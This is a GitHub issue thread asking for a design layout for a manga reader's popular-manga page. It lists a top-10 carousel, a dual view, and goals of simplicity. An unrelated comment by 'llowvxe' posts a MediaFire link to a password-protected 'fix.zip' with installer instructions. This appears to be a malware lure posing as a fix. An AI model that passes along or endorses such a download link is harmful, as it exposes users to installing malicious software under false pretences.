### ISSUE TITLE
Design Layout for popular manga page

### ISSUE THREAD

**Issue by EclipseLunaria** [EclipseLunaria/manga-reader-client#1]
Create overall design for popular manga page. The main contents should include the following

1. A top 10 carousel of the most popular manga
2. A dual view similar to the advanced search page

#### Design goals
 - keep it simple
 - keep it clean
 - functionality over fluff

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
